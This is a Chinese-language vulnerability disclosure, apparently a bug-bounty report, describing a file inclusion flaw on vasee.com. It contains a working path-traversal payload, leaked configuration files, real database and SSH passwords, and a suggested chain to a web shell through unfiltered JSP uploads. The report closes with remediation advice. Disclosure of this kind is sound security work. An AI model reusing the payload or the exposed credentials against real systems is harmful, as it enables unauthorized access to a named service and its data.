厂商,能不能求小礼物呢,菜鸟表示还没收到过礼物 不行就算了 -.-
求走大厂商啊....数据库权限不多说了

拿到了数据库的权限可以任意操控数据库,可以登陆SSH服务器

利用的是文件包含漏洞



问题页面:http://www.vasee.com/event/view.jsp?day=2014-08-03&emid=ff80808146acac6f014770b306751ec2&id=ff80808146acac6f014770b305231eb8&sub=

其中sub参数就是包含处

传递sub=index?后页面报错
 

所以可以猜测 处理代码是

'/event/view_sub/view_'+'sum参数'+'.jsp'

提交sub=1后显示正常,经过证明/event/view_sub/目录下确实有view_1.jsp

所以猜测是正确的

然后就是构造包含了,在包含这里卡了很久发现跨不出 event目录 然后web服务器是tomcat 所以读不了conf下的配置文件.

后来随手一试构造如下参数

suu=/../../../WEB-INF/web.xml?

这样后台接收后sub参数就成了 /event/view_sub/view_/../../../WEB-INF/web.xml?.jsp

?伪截断,这种截断可以用在脚本文件还有.xml .txt .css .js .html 这类文件


 

<context-param>
<param-name>uploadPath</param-name>
<param-value>/var/www/html/vasee_pics/</param-value>
<!--<param-value>D:\\upload\\</param-value>-->
</context-param>

<context-param>
<param-name>pdfPath</param-name>
<param-value>/user/local/vasee_pdfs/</param-value>
<!--<param-value>d:\\xx\\</param-value>-->
</context-param>
<context-param>
<param-name>exlPath</param-name>
<param-value>/user/local/vasee_exls/</param-value>
<!--<param-value>D:\\upload\\</param-value>-->
</context-param>

<filter>
<filter-name>SetCharacterEncoding</filter-name>
<filter-class>
com.vasee.filters.SetCharacterEncodingFilter
</filter-class>
<init-param>
<param-name>encoding</param-name>
<param-value>UTF-8</param-value>
</init-param>
</filter>

<!-- Filters for the display tag functionality -->
<filter>
<filter-name>ResponseOverrideFilter</filter-name>
<filter-class>
org.displaytag.filter.ResponseOverrideFilter
</filter-class>
</filter>
<filter>
<filter-name>hibernatesession</filter-name>
<filter-class>
org.springframework.orm.hibernate3.support.OpenSessionInViewFilter
</filter-class>
</filter>
<filter-mapping>
<filter-name>hibernatesession</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SetCharacterEncoding</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>SetCharacterEncoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ResponseOverrideFilter</filter-name>
<url-pattern>*.do</url-pattern>
</filter-mapping>
<filter-mapping>
<filter-name>ResponseOverrideFilter</filter-name>
<url-pattern>*.jsp</url-pattern>
</filter-mapping>


<!--伪静态的过滤 -->
<filter>
<filter-name>UrlRewriteFilter</filter-name>
<filter-class>
org.tuckey.web.filters.urlrewrite.UrlRewriteFilter
</filter-class>
<init-param>
<param-name>confPath</param-name>
<param-value>/WEB-INF/urlrewrite.xml</param-value>
</init-param>
</filter>
<filter-mapping>
<filter-name>UrlRewriteFilter</filter-name>
<url-pattern>/g/*</url-pattern>
</filter-mapping>

<servlet>
<servlet-name>DrawImageServlet</servlet-name>
<servlet-class>
net.sourceforge.jimagetaglib.servlet.DrawImageServlet
</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DrawImageServlet</servlet-name>
<url-pattern>/jit</url-pattern>
</servlet-mapping>

<!-- Action Servlet Configuration -->
<servlet>
<servlet-name>action</servlet-name>
<servlet-class>
org.apache.struts.action.ActionServlet
</servlet-class>
<init-param>
<param-name>config</param-name>
<param-value>/WEB-INF/struts-config.xml</param-value>
</init-param>
<init-param>
<param-name>debug</param-name>
<param-value>2</param-value>
</init-param>

<init-param>
<param-name>validate</param-name>
<param-value>true</param-value>
</init-param>

</servlet>

<!-- Action Servlet Mapping -->
<servlet-mapping>
<servlet-name>action</servlet-name>
<url-pattern>*.do</url-pattern>
</servlet-mapping>

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>
<listener>
<listener-class>
org.springframework.web.context.ContextLoaderListener
</listener-class>
</listener>

看第一行


 

<context-param>
<param-name>uploadPath</param-name>
<param-value>/var/www/html/vasee_pics/</param-value>
<!--<param-value>D:\\upload\\</param-value>-->
</context-param>

这个目录就是pics.vasee.com域名的目录 用来存放图片的

看到这思路就来了,在官网所有上传处都有漏洞可以上传jsp文件,不过当访问jsp的时候会给你解析成图片这就蛋疼了,不过现在目录有了,这俩域名都是一个服务器IP,然后在用包含漏洞包含jsp就能得到一个shell了 不过上面我说过跨不出event目录,就是从这得出的,



接下来又是一阵看web.xml的内容

挨个试一遍

找到这个文件


 

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>/WEB-INF/applicationContext.xml</param-value>
</context-param>

包含过去读出它的内容然后我又幸运的再这个文件找到另一个敏感文件


 

<bean id="propertyConfigurer"
class="org.springframework.beans.factory.config.PropertyPlaceholderConfigurer">
<property name="locations">
<list>
<value>/WEB-INF/config.properties</value>
</list>
</property>
</bean>

OK 继续读出这个文件内容,惊喜来了!

猜内容是什么？


 

subDomain.id=1006
hibernate.connection.driver_class org.postgresql.Driver
hibernate.connection.username=postgres



#hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/test
hibernate.connection.url=jdbc\:postgresql\://127.0.0.1/vaseedbstable
#hibernate.connection.url=jdbc\:postgresql\://103.31.201.95/test
#hibernate.connection.password=123456

hibernate.connection.password=e2010ee_yan
#hibernate.connection.password=root
#hibernate.connection.password=voasseeee
#hibernate.connection.password=vpaosseteg

phoneapp.android.version=1.1
phoneapp.iphone.version=1.1
phoneapp.android.update_url=http://down.mumayi.com/94512
phoneapp.iphone.update_url=https://itunes.apple.com/cn/app/vasee/id488543987?mt=8
#font.src.path=c\:/windows/fonts/
font.src.path=/user/local/vasee_pdfs/source/

数据库连接信息! 爽!

不过悲剧又来了,没有开放数据库端口

然后想到连它的SSH端口(记忆中在一个网页看到过postgresql的postgres用户存在于系统帐号)

不知道是不是真的,-.-



然后就连接成功了权限是数据库权限

用户名就是postgres

密码不是数据库密码

hibernate.connection.password=e2010ee_yan

而是这个密码

#hibernate.connection.password=vpaosseteg

可以查看web代码,无权限修改,能任意操作数据库

最后来几张截图 0.0


 

 

 

<jsp:include page="/event/view_sub/view_${sub}.jsp" />

这个就是包含处的代码,表示不懂JSP不明白为什么跨不了目录

 

修复方案：

包含处进行过滤,SSH也设置一下连接IP,文件上传处也过滤一下,把密码改一下,虽然,目前没发现利用点不过以后的事很难说,最后请厂商相信我,我连看都没看数据库就是连接了一下然后截了图退出了.